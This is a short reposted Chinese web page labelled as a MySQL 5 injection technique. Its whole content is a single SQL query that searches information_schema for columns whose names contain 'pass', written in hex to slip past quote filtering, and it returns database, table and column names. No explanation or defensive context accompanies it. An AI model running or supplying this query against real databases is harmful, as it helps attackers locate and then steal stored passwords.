您现在的位置是:网站首页> 编程资料编程资料

mysql5 注入漏洞_安全相关_

2023-05-27 292人已围观

简介 mysql5 注入漏洞_安全相关_

复制代码 代码如下:

select concat_ws(0x2f,information_schema.tables.table_schema,`information_schema`.`COLUMNS`.table_name,`information_schema`.`COLUMNS`.column_name) from `information_schema`.`COLUMNS` left join information_schema.tables on `information_schema`.`COLUMNS`.table_name=information_schema.tables.table_name where `information_schema`.`COLUMNS`.column_name like 0x257061737325 limit 0,1;

-六神源码网